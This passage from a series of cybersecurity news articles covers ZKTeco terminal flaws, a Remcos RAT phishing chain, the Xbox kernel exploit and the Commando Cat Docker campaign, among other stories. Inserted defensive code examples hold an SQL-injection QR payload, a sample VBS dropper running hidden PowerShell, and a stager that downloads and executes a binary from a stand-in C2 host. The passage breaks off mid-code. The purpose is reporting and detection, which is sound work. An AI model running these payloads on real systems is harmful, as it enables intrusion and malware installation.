  • Physical bypass via fake QR codes: CVE-2023-3938 allows attackers to perform a SQL injection attack by injecting malicious code into the access string carried in a QR code, potentially gaining unauthorized entry to restricted areas.
  • Biometric data theft and backdoor deployment: CVE-2023-3940 and CVE-2023-3942 could give attackers access to sensitive user data and password hashes stored on the device, while CVE-2023-3941 could allow them to remotely alter the device database, potentially adding unauthorized individuals to the system or creating a backdoor.
  • Remote code execution: CVE-2023-3939 and CVE-2023-3943 enable the execution of arbitrary commands or code on the device, giving attackers full control and the ability to launch further attacks on the wider network.
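The QR-code SQL injection class described above, as an added example rather than ZKTeco's firmware or Kaspersky's proof of concept: a constructed Python/sqlite3 model of a terminal that looks up the card number decoded from a QR code. The table layout, the query and the payload are assumptions chosen to show the bug pattern, not the vendor's actual implementation. It shows how interpolating the access string into the query lets an attacker make the lookup return an arbitrary (here, the most privileged) row, and how a parameterized query combined with an allow-list on the decoded value closes the hole.

```python
"""Constructed illustration of a SQL-injection bypass in a QR/badge reader.

Added example, not ZKTeco's code: the schema, query and payload below are
assumptions that model the class of bug the article describes.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for a terminal's local user database (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (card_no TEXT PRIMARY KEY, name TEXT, door_group INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("1001", "alice", 1), ("1002", "bob", 1), ("9001", "plant-admin", 9)],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, qr_payload: str):
    """Bug pattern: the decoded QR string is interpolated straight into SQL."""
    query = f"SELECT name, door_group FROM users WHERE card_no = '{qr_payload}'"
    return conn.execute(query).fetchone()


def lookup_hardened(conn: sqlite3.Connection, qr_payload: str):
    """Fix: allow-list the decoded value, then bind it as a parameter."""
    if not qr_payload.isdigit() or len(qr_payload) > 16:
        return None  # a card number is digits only; anything else is rejected
    return conn.execute(
        "SELECT name, door_group FROM users WHERE card_no = ?", (qr_payload,)
    ).fetchone()


def door_opens(row, required_group: int) -> bool:
    """Access decision: the returned row must carry a sufficient door group."""
    return row is not None and row[1] >= required_group


# Constructed malicious QR payload: closes the string literal, ORs in a
# tautology, and sorts so the highest-privilege row is returned first.
# The trailing '-- ' comments out the quote the query appends.
INJECTION_PAYLOAD = "' OR '1'='1' ORDER BY door_group DESC -- "


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", lookup_vulnerable(db, INJECTION_PAYLOAD))  # plant-admin row
    print("hardened:  ", lookup_hardened(db, INJECTION_PAYLOAD))    # None
```

Against the vulnerable lookup the forged QR code yields the plant-admin row and the door opens at the highest group; the hardened lookup rejects the same payload before any SQL runs, and binding the value as a parameter protects even card numbers that pass the allow-list.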
Georgy Kiguradze, Senior Application Security Specialist at Kaspersky, expressed concern over the real-world risks posed by these vulnerabilities, including the deepfake and social engineering attacks that stolen biometric data enables, and stressed the urgency of patching them. He stated:
"The impact of the discovered vulnerabilities is alarmingly diverse. To begin with, attackers can sell stolen biometric data on the dark web, subjecting affected individuals to increased risks of deepfake and sophisticated social engineering attacks. Furthermore, the ability to alter the database weaponizes the original purpose of the access control devices, potentially granting access to restricted areas for nefarious actors. Lastly, some vulnerabilities enable the placement of a backdoor to covertly infiltrate other enterprise networks, facilitating the development of sophisticated attacks, including cyberespionage or sabotage. All these factors underscore the urgency of patching these vulnerabilities and thoroughly auditing the device's security settings for those using the devices in corporate areas."

Mitigating Risks to Biometric Terminals

The researchers stated that they had disclosed all information about the discovered vulnerabilities to ZKTeco, but had no public information on whether the flaws have been patched. In the meantime, they shared the following recommendations to protect these biometric terminals from attack:
  • Isolate biometric reader usage into a separate network segment.
  • Employ robust administrator passwords and change default ones.
  • Audit and fortify the device's security settings, including enabling temperature detection.
  • If feasible, minimize the use of QR code functionality.
  • Regularly update the device's firmware.

City of Moreton Bay Investigates Data Breach After Resident Discovered Leak of Private Information

By: Alan J
12 June 2024 at 10:31

City of Moreton Bay council data breach ratepayers

A resident of Moreton Bay, Australia was shocked to discover that the private information of several ratepayers in the region, including friends and neighbors, had been accidentally published on the Moreton Bay council's official website. The leaked information included names, residential addresses, email addresses and phone numbers, as well as residents' complaints to the council and details of council investigations.

Data Breach Discovered By Local Resident

City of Moreton Bay resident Piper Lalonde, who works as a data analyst, discovered the breach along with her husband. They were shocked to learn that their personal information was freely available on the council's online customer request portal, including their phone numbers, complaints, the requests they had made for new bins, and the GPS coordinates from which the requests had been filed. A further search of the records revealed the personal information of friends and neighbors who were fellow ratepayers. Piper reported this to the council, and the website was taken down the next day. However, she remained unsatisfied with the lack of notification to affected residents. "I would expect they'd have to send out some formal communication letting people know their information was publicly accessible, but there was no indication they were going to do that," she said. She expressed concern that people might stumble upon complaints made about them by other residents, adding, "If this gets in the wrong hands, it just takes one person to see a complaint about them, and who knows what they'll do."

City of Moreton Bay Responses to Data Breach

After Piper's report, the website was taken down. It appears to be functional again as of now, with some functions still limited, and carries an official notice about the incident:
(Image: City of Moreton Bay council notice on the customer request portal. Source: moretonbay.qld.gov.au)
We are experiencing system difficulties with our customer request portal. Our third-party provider is investigating a possible information breach. The cause is yet to be determined but there is no indication this is a cyber attack. We will never contact you via unsolicited calls to request sensitive information. No action is required from you at this stage. We will continue to keep you informed.
The notice indicates that the breach stemmed from a third-party provider. The Cyber Express has reached out to the Moreton Bay Council's Privacy Officer for further information, but no response has been received as of publication. The scale of the breach and its impact on residents are currently unknown, as is how many individuals may have accessed the data before the website was taken down and subsequently limited.

Apple Launches β€˜Private Cloud Compute’ Along with Apple Intelligence AI

By: Alan J
11 June 2024 at 19:14

Private Cloud Compute Apple Intelligence AI

In a bid to redefine cloud security and privacy standards, Apple has unveiled Private Cloud Compute (PCC), a cloud intelligence system designed to back its new Apple Intelligence features with safety and transparency guarantees while extending Apple devices into the cloud. The move comes in response to widespread concerns about combining artificial intelligence with cloud processing.

Private Cloud Compute Aims to Secure Cloud AI Processing

Apple has stated that its new Private Cloud Compute (PCC) is designed to enforce privacy and security standards over AI processing of private information. "For the first time ever, Private Cloud Compute brings the same level of security and privacy that our users expect from their Apple devices to the cloud," said an Apple spokesperson.
(Image: Private Cloud Compute and Apple Intelligence overview. Source: security.apple.com)
At the heart of PCC is Apple's stated commitment to on-device processing. "When Apple is responsible for user data in the cloud, we protect it with state-of-the-art security in our services," the spokesperson explained. "But for the most sensitive data, we believe end-to-end encryption is our most powerful defense." Despite this commitment, Apple says that more sophisticated requests require Apple Intelligence to use larger, more complex models in the cloud. This presented a challenge, as the company found traditional cloud AI security models lacking in meeting its privacy expectations. Apple states that PCC is built around the following properties:
  • Stateless computation: PCC processes user data only for the purpose of fulfilling the user's request, and then erases the data.
  • Enforceable guarantees: PCC is designed to provide technical enforcement for the privacy of user data during processing.
  • No privileged access: PCC does not allow Apple or any third party to access user data without the user's consent.
  • Non-targetability: PCC is designed to prevent targeted attacks on specific users.
  • Verifiable transparency: PCC provides transparency and accountability, allowing users to verify that their data is being processed securely and privately.

Apple Invites Experts to Test Standards; Online Reactions Mixed

At Apple's annual developer conference this week, CEO Tim Cook described Apple Intelligence as a "personal intelligence system" that can understand and contextualize personal data to deliver results that are "incredibly useful and relevant," making "devices even more useful and delightful." Apple Intelligence mines and processes data across apps, software and services on Apple devices, including emails, images, messages, texts, documents, audio files, videos, contacts, calendars, Siri conversations, online preferences and past search history. The new PCC system attempts to ease consumer privacy and safety concerns. In its description of 'Verifiable transparency,' Apple stated:
"Security researchers need to be able to verify, with a high degree of confidence, that our privacy and security guarantees for Private Cloud Compute match our public promises. We already have an earlier requirement for our guarantees to be enforceable. Hypothetically, then, if security researchers had sufficient access to the system, they would be able to verify the guarantees."
However, despite Apple's assurances, the announcement of Apple Intelligence drew mixed reactions online, with some already likening it to Microsoft's Recall. Elon Musk took to X to announce that Apple devices may be banned from his companies, calling the integration of OpenAI an 'unacceptable security violation.' Others raised questions about what information might be sent to OpenAI.
(Images: reactions on X.com to the Apple Intelligence announcement. Source: X.com)
According to Apple, requests made on its devices are not stored by OpenAI, and users' IP addresses are obscured. Apple stated that it would also add "support for other AI models in the future." Andy Wu, an associate professor at Harvard Business School who researches the use of AI by tech companies, highlighted the challenge of running powerful generative AI models while limiting their tendency to fabricate information: "Deploying the technology today requires incurring those risks, and doing so would be at odds with Apple's traditional inclination toward offering polished products that it has full control over."

South Korean Researchers Observe Remcos RAT Distributed Through Fake Shipping Lures

By: Alan J
11 June 2024 at 16:15

Remcos RAT Shipping

Researchers have discovered a new phishing campaign in which threat actors distribute the Remcos RAT malware inside UUEncoded (UUE) file attachments to emails purporting to concern import or export shipments. The UUE attachments are compressed with Power Archiver, a proprietary, cross-platform archive utility that supports both Windows and macOS.

Use of UUEncoding (UUE) Files to Distribute Remcos RAT Malware

Researchers from AhnLab found that the threat actors behind the campaign use UUEncoded files with a .UUE extension. UUEncoding represents binary data as plain text, which makes the format suitable for attaching to e-mail or Usenet messages. The malicious .UUE files attached to the phishing emails encode a VBS script; the threat actors appear to have chosen the format and encoding in an attempt to evade detection.
(Image: Phishing email carrying the .UUE attachment. Source: asec.ahnlab.com)
When decoded, the VBS script is obfuscated, making it difficult to analyze. The script saves a PowerShell script into the %Temp% directory and executes it. That script downloads the file Haartoppens.Eft, which contains a further PowerShell script. This script is also obfuscated and is designed to inject shellcode into the wab.exe process.
(Image: Obfuscated PowerShell stage. Source: asec.ahnlab.com)
The shellcode establishes persistence by adding a registry key on the infected system, then contacts a remote C&C server for additional instructions, which ultimately download the Remcos RAT for execution on the infected system.
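The decoding step in the chain above, as an added example that is neither AhnLab's code nor the campaign's actual sample: a Python decoder for uuencoded attachments built on binascii's uu primitives (the higher-level uu module was removed from Python 3.13), followed by a simple triage check that flags a decoded payload whose declared filename has a script extension or whose content carries loader markers of the kind this chain uses (a WScript.Shell object, a powershell.exe invocation). The .vbs content, the benign control file and the marker list are constructed here for illustration.

```python
"""Added example: parse a uuencoded (.uue) attachment and triage its payload.

Not AhnLab's code and not the real campaign sample; the attachments are
constructed below so that the example runs offline.
"""
import binascii
import re

# Loader markers that are unusual in a benign document but typical of the
# VBS/PowerShell droppers described in the article (constructed heuristic).
SCRIPT_MARKERS = (
    re.compile(rb'CreateObject\s*\(\s*"WScript\.Shell"', re.I),
    re.compile(rb"powershell(\.exe)?\s+-", re.I),
    re.compile(rb"-enc(odedcommand)?\s", re.I),
    re.compile(rb"\bExecute\s*\(", re.I),
)
SCRIPT_EXTENSIONS = (".vbs", ".vbe", ".js", ".jse", ".ps1", ".bat", ".cmd", ".hta", ".wsf")


def uuencode(name: str, data: bytes, mode: int = 0o644) -> str:
    """Produce a uuencoded text block (used here only to build the samples)."""
    lines = [f"begin {mode:o} {name}"]
    for i in range(0, len(data), 45):  # uuencode carries 45 raw bytes per line
        lines.append(binascii.b2a_uu(data[i:i + 45]).decode("ascii").rstrip("\n"))
    lines.append("`")  # zero-length data line terminates the body
    lines.append("end")
    return "\n".join(lines) + "\n"


def uudecode(text: str) -> tuple[str, bytes]:
    """Return (declared filename, decoded bytes); reject malformed input."""
    lines = text.splitlines()
    try:
        start = next(i for i, ln in enumerate(lines) if ln.startswith("begin "))
    except StopIteration:
        raise ValueError("no 'begin' header") from None
    header = lines[start].split(" ", 2)  # "begin <mode> <name>", name may contain spaces
    if len(header) != 3:
        raise ValueError("malformed 'begin' header")
    name = header[2]
    out = bytearray()
    for ln in lines[start + 1:]:
        if ln == "end":
            break
        if ln in ("", "`"):  # skip blank lines and the zero-length terminator
            continue
        out += binascii.a2b_uu(ln)  # each line decodes to its declared byte count
    else:
        raise ValueError("missing 'end' trailer")
    return name, bytes(out)


def triage_attachment(uue_text: str) -> dict:
    """Decode the attachment and flag script extensions or loader markers."""
    name, payload = uudecode(uue_text)
    ext = name.lower()[name.rfind("."):] if "." in name else ""
    hits = [p.pattern.decode() for p in SCRIPT_MARKERS if p.search(payload)]
    return {
        "filename": name,
        "size": len(payload),
        "script_extension": ext in SCRIPT_EXTENSIONS,
        "marker_hits": hits,
        "suspicious": ext in SCRIPT_EXTENSIONS or bool(hits),
    }


# Constructed sample: a tiny VBS dropper of the shape the article describes
# (WScript.Shell launching PowerShell from %TEMP%). Not the campaign's file.
SAMPLE_VBS = (
    b'Set sh = CreateObject("WScript.Shell")\r\n'
    b'sh.Run "powershell.exe -nop -w hidden -c ""iex (gc $env:TEMP\\stage.ps1)""", 0, False\r\n'
)
SAMPLE_UUE = uuencode("Invoice_order_new.vbs", SAMPLE_VBS)
BENIGN_UUE = uuencode("invoice.txt", b"Thank you for your order.\n")

if __name__ == "__main__":
    print(triage_attachment(SAMPLE_UUE))
    print(triage_attachment(BENIGN_UUE))
```

The decoder is deliberately strict about the begin/end framing: a mail gateway that only looks at the attachment's declared extension or MIME type sees text, while the decoded bytes are what the victim's machine will execute, so detection has to be applied after decoding.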

Remcos RAT malware

Remcos RAT collects system information from infected machines and stores keylogging data in the %AppData% directory, then sends this data to the remote command-and-control (C&C) server, which is hosted on a DuckDNS domain.
(Image: AhnLab analysis of the Remcos RAT sample. Source: asec.ahnlab.com)
Remcos is a commercial remote access tool (RAT) that is advertised as a legitimate product but has been observed in numerous threat actor campaigns. Once loaded, Remcos opens a backdoor on the targeted system, allowing complete control. The researchers have shared the following indicators to help detect and stop this campaign:
IOCs (Indicators of Compromise)
  • b066e5f4a0f2809924becfffa62ddd3b (Invoice_order_new.uue)
  • 7e6ca4b3c4d1158f5e92f55fa9742601 (Invoice_order_new.vbs)
  • fd14369743f0ccd3feaacca94d29a2b1 (Talehmmedes.txt)
  • eaec85388bfaa2cffbfeae5a497124f0 (mtzDpHLetMLypaaA173.bin)
File Detection
  • Downloader/VBS.Agent (2024.05.17.01)
  • Data/BIN.Encoded (2024.05.24.00)
C&C (Command & Control) Servers
  • frabyst44habvous1.duckdns[.]org:2980:0
  • frabyst44habvous1.duckdns[.]org:2981:1
  • frabyst44habvous2.duckdns[.]org:2980:0
The researchers also shared the following general recommendations to avoid similar phishing campaigns:
  • Refrain from accessing emails from unknown sources.
  • Refrain from running or enabling macro commands when accessing downloaded attachment files. Users can set programs to highest levels of security, as lower levels may automatically execute macro commands without displaying any notification.
  • Update anti-malware engines to their latest versions.
The UUE format has been used in several previous malicious campaigns because it can slip past security tools, and a researcher has previously reported a UUEncode-related vulnerability in Python itself.

BreachForums Down, Official Telegram Channels Deleted and Database Potentially Leaked

By: Alan J
11 June 2024 at 09:32

BreachForums 502 Gateway 502- Bad Gateway

Both the clearnet domain and the onion dark web domain of the infamous BreachForums appear to be down, in a development that has confused both security researchers and cybercriminals. Attempting to visit either site returns a '502 Bad Gateway' error. While the site has suffered several disruptions due to law enforcement takedown attempts, no connection to law enforcement activity has been established so far.

BreachForums Down with '502- Bad Gateway' Error

BreachForums had earlier faced a domain seizure by the FBI in a coordinated effort with various law enforcement agencies. Shortly afterwards, however, 'ShinyHunters' managed to recover the seized domains; allegedly leaked FBI communications indicated the agency had lost control over the domain, while BreachForums staff claimed it had been transferred to a different host. The site now appears to be down again, but with no seizure notice, leading to speculation over what has happened to the site and its admin ShinyHunters. On X and LinkedIn, security researcher Vinny Troia claimed that ShinyHunters had sent a direct message on Telegram indicating that he was retiring from the forums, as there was 'too much heat', and had shut it down.
(Image: Vinny Troia's post on ShinyHunters and BreachForums. Source: X.com)
Both the researcher's X and LinkedIn posts attribute the incident to the FBI 'nabbing' ShinyHunters, even congratulating the agency.

BreachForums Telegram Channels Deleted

Shortly after the official domains went down, several official Telegram accounts that were associated with Breach Forums, including the main announcement channel and the Jacuzzi 2.0 account, were deleted. Forum moderator Aegis stated in a PGP signed message that Shiny Hunters had been banned from Telegram. [caption id="attachment_76580" align="alignnone" width="349"]BreachForums Telegram Channels BreachForums.st Source: Telegram[/caption] [caption id="attachment_76582" align="alignnone" width="525"]BreachForums Telegram Channels Baph Source: Telegram[/caption] In a new 'Jacuzzi' Telegram channel created shortly afterwards, a pinned message appears to confirm that the administrator ShinyHunters had quit after wishing to no longer maintain the forum. The message affirms that Shiny had not been arrested, but rather quit, while the forum has not been officially seized but taken down. [caption id="attachment_76604" align="alignnone" width="799"]BreachForums ShinyHunters Jacuzi Telegram Source: Telegram[/caption] A while later, a database allegedly containing data from the 'breachforums.is' domain (the previous official domain associated with BreachForums before it shifted to the .st domain) had been circulating among Telegram data leak and sharing channels. Another threat actor stated that the circulating leaks were likely an attempt to gain attention and subscribers in light of recent events, stating that the info is unverified and password-protected. [caption id="attachment_76578" align="alignnone" width="670"]BreachForums Telegram Channels Deleted Database leak Source: Telegram[/caption] Several threat actors had attempted to use these disruptions to promote their own alternatives such as Secretforums and Breach Nation. However, the administrator Astounded, who owned Secretforums, had himself announced his retirement from involvement from forum activity recently. 
[Image: Astounded BreachForums retirement. Source: Telegram]

The threat actor USDoD still appears to be promoting Breach Nation as an alternative to BreachForums, even welcoming the move as a takedown of 'competitors.'

[Image: USDoD BreachForums Breach Nation. Source: X.com]

These incidents, along with ShinyHunters' disappearance, the deletion or unavailability of official channels, and the arrests and disruptions associated with the forums, raise uncertainty over the community's future prospects as well as larger implications for data leak sharing. This article will be updated as we gather more information on events surrounding BreachForums. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Modder Discovered Kernel-Level Exploit in Xbox One Consoles

By: Alan J
10 June 2024 at 19:18

Xbox one hack exploit

Although the Xbox One family of consoles has been on the market for years, until recently there were no softmods (software modifications that make a system behave differently from the manufacturer's intent) available to users. That has seemingly changed, as an individual has revealed a kernel-level exploit along with a limited proof of concept. The method uses an easily available app called 'Game Script', present on the Microsoft Store.

'Game Script' Xbox Console Kernel-Level Exploit

carrot_c4k3, the individual behind the discovery, disclosed on X that the exploit, which is not a jailbreak, works against the System OS that runs on newer Xbox consoles such as the Xbox One and Xbox Series. System OS exists to let a wide variety of applications run on these consoles inside a virtual machine, and applications downloaded from the Microsoft Store run in this layer. Xbox users can typically gain access to this environment by enabling developer mode on their consoles. carrot_c4k3 stated that while the exploit allows full control over the VM used for homebrew on a retail Xbox, it does not enable the use of pirated software. The method currently relies on the Game Script UWP application available on the Microsoft Store, which lets users write and run their own scripts on the device. The exploit consists of two components:
  1. User mode: Initial steps in which the user gains native code execution in the context of a UWP (Microsoft Store) application.
  2. Kernel exploit: In this step the user exploits a kernel vulnerability on these devices to gain arbitrary kernel read/write, which can then be used to elevate the privileges of a chosen running process.
The proof-of-concept exploit shared on GitHub is currently limited to the context of UWP apps, which are more 'locked down.' However, carrot_c4k3 shared their intent to release another exploit for Xbox One and Xbox Series consoles by next month that would provide full kernel read/write within the System OS environment. That full exploit is stated to rely on information leaks from 'NtQuerySystemInformation', which are not available to UWP apps; hence the user is developing an alternative that does not rely on UWP apps. The exploit allows users to bypass the fee required to enable developer mode on Xbox consoles and to modify game save data on the device, but it does not allow modding of the games themselves. The modder also discussed the possibility of using the exploit to run 'simple emulators' for games intended for older devices. carrot_c4k3 acknowledged that use of the exploit could potentially be detected by Microsoft, and recommended running it on a dedicated offline console instead.

Exploit Might Have Been Patched In Newer Xbox Firmware Versions

A set of steps to be performed for the hack was shared on the Xbox One Research Github page:
  • Ensure your Xbox Live account Login-Type is configured as β€œNo barriers” aka. auto-login with no password prompt
  • Set your console as β€œHome Console” for this account
  • Download the App Game Script
  • Start the app (to ensure license is downloaded/cached)
  • Take your console offline! To make extra sure it cannot reach the internet, set a manual primary DNS address of 127.0.0.1
  • Get a device/microcontroller that can simulate a Keyboard (rubber ducky or similar) - otherwise you have to type a lot manually :D
The page states that the exploit is "likely to be patched soon (in next System Update)." A thread on GBAtemp.net, a forum for discussing various video game platforms, stated that the latest firmware update for the Xbox One has reportedly already patched the exploit, making firmware 10.0.25398.4478 the last exploitable version. While the full consequences of this exploit, and of the one still to be shared, are unknown, it highlights the interest console players have in bypassing manufacturer-intended device limits.

Microsoft and Google Announce Plans to Help Rural U.S. Hospitals Defend Against Cyberattacks

By: Alan J
10 June 2024 at 16:55

Microsoft Google Aid Rural Hospitals

Microsoft and Google have announced plans to offer free or heavily discounted cybersecurity services to rural hospitals across the United States. The initiatives come as the U.S. healthcare sector faces a surge in ransomware attacks, which more than doubled last year, posing a serious threat to patient care and hospital operations. The program, developed in collaboration with the White House, the American Hospital Association, and the National Rural Health Association, aims to shore up the defenses of rural hospitals by providing free security updates, security assessments, and training for hospital staff.

Microsoft and Google Cybersecurity Plans for Rural Hospitals

Microsoft has launched a full-fledged cybersecurity program to meet the needs of rural hospitals, which are often more vulnerable to cyberattacks because they have more limited IT security resources, staff and training than their urban peers. The program will deliver free and low-cost technology services, including:
  • Nonprofit pricing and discounts of up to 75% on Microsoft's security products for independent Critical Access Hospitals and Rural Emergency Hospitals.
  • Free advanced security suites for larger rural hospitals already equipped with eligible Microsoft solutions.
  • Free Windows 10 security updates for participating rural hospitals for at least one year.
  • Free cybersecurity assessments and training for hospital employees to help them better manage system security.
Justin Spelhaug, corporate vice president of Microsoft Philanthropies, said in a statement: “Healthcare should be available no matter where you call home, and the rise in cyberattacks threatens the viability of rural hospitals and impacts communities across the U.S. Microsoft is committed to delivering vital technology security and support at a time when these rural hospitals need them most.” Anne Neuberger, Deputy National Security Advisor for Cyber and Emerging Technologies, said in a statement:
“Cyber-attacks against the U.S. healthcare systems rose 130% in 2023, forcing hospitals to cancel procedures and impacting Americans’ access to critical care. Rural hospitals are particularly hard hit as they are often the sole source of care for the communities they serve and lack trained cyber staff and modern cyber defenses. President Biden is committed to every American having access to the care they need, and effective cybersecurity is a part of that. So, we’re excited to work with Microsoft to launch cybersecurity programs that will provide training, advice and technology to help America’s rural hospitals be safe online.”
Alongside Microsoft's efforts, Google also announced that it will provide free cybersecurity advice to rural hospitals and non-profit organizations while also launching a pilot program to match its cybersecurity services with the specific needs of rural healthcare facilities.

Plans Are Part of Broader National Effort

Rural hospitals remain one of the most common targets for cyberattacks, according to data from the National Rural Health Association. Rural hospitals in the U.S. serve over 60 million people, some of whom already have to travel considerable distances for care even before a cyberattack disrupts services. Neuberger stated, “We’re in new territory as we see ... this wave of attacks against hospitals.” Rick Pollack, president of the American Hospital Association, said, “Rural hospitals are often the primary source of healthcare in their communities, so keeping them open and safe from cyberattacks is critical. We appreciate Microsoft stepping forward to offer its expertise and resources to help secure part of America’s healthcare safety net.” The plans are part of a broader effort by the United States government to enlist private partners and tech giants such as Microsoft and Google to use their expertise to plug significant gaps in the defense of the healthcare sector.

NHS Makes Urgent Request for Blood Donations After Ransomware Attack Interrupts Blood Transfusions

By: Alan J
10 June 2024 at 12:04

NHS Blood Donations

NHS Blood and Transplant (NHSBT) is urgently appealing for O blood-type donors across England after a ransomware attack affected several major London hospitals. The cyberattack significantly disrupted the hospitals' ability to match patients' blood types, leading to increased demand for O-positive and O-negative blood, which can be given to a wider range of patients when a patient's own blood type cannot be confirmed in time. The public health institution is asking donors of these blood types to book appointments at any of the 25 NHS blood donor centres in England in order to boost limited stocks and ensure the availability of essential blood supplies to patients.

NHS Blood and Transplant's Urgent Appeal for Blood Donations

The recent cyberattack on the pathology firm Synnovis, believed to have been carried out by the Russian cybercriminal group Qilin, caused significant disruption to several London hospitals. As a result, affected hospitals have been unable to match patients' blood at the usual rate, leading to the declaration of a critical incident and the cancellation of scheduled blood transfusions. Gail Miflin, chief medical officer at NHS Blood and Transplant, emphasized the importance of O blood-type donations during this critical time. She called on existing O blood donors to book urgent appointments and encouraged potential new donors to find out their blood type and help address the shortage. During NHS National Blood Week, it was revealed that hospitals require three blood donations every minute. With around 13,000 appointments available nationwide this week, 3,400 of them in London, there are many opportunities for donors to come forward. Stephen Powis, the medical director for NHS England, praised the resilience of NHS staff amid the cyberattack and urged eligible donors to take one of the 13,000 available appointments at NHS blood donor centres across the country. To learn more and find details on how to donate, interested individuals are encouraged to search 'GiveBlood' online and on social media or visit Blood.co.uk.

[Image: NHS Blood and Transplant (NHSBT) ransomware blood donations appeal. Source: www.blood.co.uk]

Impact of the Cyberattack on London Hospitals

Several prominent London hospitals, including King's College Hospital, Guy's and St Thomas', the Royal Brompton, and the Evelina London Children's Hospital, declared a critical incident following the cyberattack on the pathology firm Synnovis, which provides blood-testing services to these hospitals and several others in south-east London. The attack forced hospital staff to cancel procedures such as cancer surgeries and transplants because blood transfusion services were unavailable after the severe disruption. In a statement on its official website, an NHS London spokesperson stressed the importance of pathology services to treatment:
“NHS staff are working around the clock to minimise the significant disruption to patient care following the ransomware cyber-attack and we are sorry to all those who have been impacted. Pathology services are integral to a wide range of treatments and we know that a number of operations and appointments have been cancelled due to this attack. We are still working with hospitals and local GP services to fully assess the disruption, and ensure the data is accurate. In the meantime our advice to patients remains, if you have not been contacted please do continue to attend your appointments.”
A senior NHS manager told the Health Service Journal (HSJ) that the incident was “everyone’s worst nightmare.” As blood has a limited shelf life of 35 days, hospital stocks must be continually replenished. More units of O-negative and O-positive blood will be required over the coming weeks to accommodate an anticipated increase in surgeries and procedures caused by the earlier delays.

β€˜Commando Cat’ Cryptojacking Campaign Exploits Remote Docker API Servers

By: Alan J
7 June 2024 at 18:46

Commando Cat Docker Containers API

A new cryptojacking campaign dubbed "Commando Cat" has been observed exploiting exposed Docker Remote API servers to deploy cryptocurrency miners. The operation leverages legitimate Docker images from the open-source Commando project, a tool for on-demand Docker image creation that helps SysOps and DevOps professionals quickly build images for routine operations.

Commando Cat Initial Access and Attack Sequence

The Commando Cat campaign, identified by researchers from Trend Micro, has been active since early 2024. The attack begins with a probe of the Docker Remote API server. If the server responds, the attackers check whether the "cmd.cat/chattr" image is present and pull it from the cmd.cat repository if it is not. The image appears harmless at first glance but serves as a stepping stone for the later stages of the attack. Using it, the attackers create a container whose volume bindings mount the host's root directory at the container's /hs directory; a chroot into that directory then escapes the container and gives unrestricted access to the host file system. They also bind the Docker socket into the container, allowing them to control Docker as if they were on the host itself. The container executes a base64-encoded script that downloads and runs a malicious binary from the command-and-control (C&C) server. The researchers identified the downloaded binary as ZiggyStarTux, an open-source IRC botnet based on the Kaiten malware.

Commando Cat Detection and Mitigation

Although the campaign's C&C server was down during analysis, the researchers recorded several technical specifics of the operation. Potential misuse of Dropbear SSH on TCP port 3022, together with the use of port 1219 for the C&C server, can help detect the presence of the malware. Unauthorized IRC communications along with the following User-Agent strings are further indicators:
  • HackZilla/1.67 [en] (X11; U; Linux 2.2.16-3 x64)
  • Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
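The checks below are an added detection example written for this write-up, not Trend Micro's tooling or the campaign's code. It runs the indicators above (the two User-Agent strings, TCP/3022 and TCP/1219) and the container-escape primitives from the attack sequence (a cmd.cat image, the host root or the Docker socket bound into a container, a chroot, and a base64-encoded stager) over a handful of constructed events; the hostnames, ports in the sample records and the c2.invalid domain are invented for the example.

```python
"""Detection pass over constructed Docker API and network events.

Added example for the Commando Cat tradecraft described above; the
events below are made up to illustrate the checks, not captured traffic.
"""
import base64
import json
import re
from typing import Dict, List

# Indicators quoted in the write-up: IRC-bot User-Agent strings, Dropbear SSH on
# TCP/3022 and the C&C port 1219.
SUSPICIOUS_USER_AGENTS = {
    "HackZilla/1.67 [en] (X11; U; Linux 2.2.16-3 x64)",
    "Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)",
}
SUSPICIOUS_PORTS = {1219: "commando-cat-c2", 3022: "dropbear-ssh"}
DOCKER_API_PORTS = {2375, 2376}  # conventional Docker Remote API ports
# A bind of either source hands the container the host: its root filesystem
# (mounted at /hs in the campaign) or the Docker control socket.
DANGEROUS_BIND_SOURCES = {"/", "/var/run/docker.sock"}
B64_PIPE = re.compile(r"echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)")


def inspect_create_body(body: Dict) -> List[str]:
    """Flag escape primitives in a POST /containers/create request body."""
    findings = []
    image = body.get("Image", "")
    if image.startswith("cmd.cat/"):
        findings.append(f"image-from-cmd.cat:{image}")
    host_cfg = body.get("HostConfig", {})
    for bind in host_cfg.get("Binds", []):
        if bind.split(":", 1)[0] in DANGEROUS_BIND_SOURCES:
            findings.append(f"host-bind:{bind}")
    if host_cfg.get("Privileged"):
        findings.append("privileged-container")
    cmd = " ".join(body.get("Cmd", []))
    if "chroot" in cmd:
        findings.append("chroot-in-cmd")
    match = B64_PIPE.search(cmd)
    if match:
        # Decode the staged payload so the analyst sees what would have run.
        try:
            payload = base64.b64decode(match.group(1)).decode("utf-8", "replace")
        except ValueError:
            payload = "<undecodable>"
        findings.append(f"base64-payload:{payload.strip()}")
    return findings


def inspect_event(ev: Dict) -> List[str]:
    """Apply the network and API indicators to one normalised event."""
    findings = []
    if ev.get("user_agent") in SUSPICIOUS_USER_AGENTS:
        findings.append("ioc-user-agent")
    port = ev.get("dst_port")
    if port in SUSPICIOUS_PORTS:
        findings.append(f"ioc-port:{SUSPICIOUS_PORTS[port]}")
    if port in DOCKER_API_PORTS and ev.get("path", "").endswith("/containers/create"):
        findings.append("docker-api-container-create")
        if ev.get("body"):
            findings.extend(inspect_create_body(json.loads(ev["body"])))
    return findings


def scan(events: List[Dict]) -> Dict[int, List[str]]:
    """Return {event index: findings} for every event that tripped a check."""
    hits = {}
    for idx, ev in enumerate(events):
        found = inspect_event(ev)
        if found:
            hits[idx] = found
    return hits


# Constructed sample events (hypothetical hosts and C2 domain).
STAGER = "curl http://c2.invalid/zig -o /tmp/zig; chmod +x /tmp/zig; /tmp/zig"
STAGER_B64 = base64.b64encode(STAGER.encode()).decode()
SAMPLE_EVENTS = [
    {"dst_port": 443, "path": "/index.html", "user_agent": "Mozilla/5.0 (X11; Linux x86_64)"},
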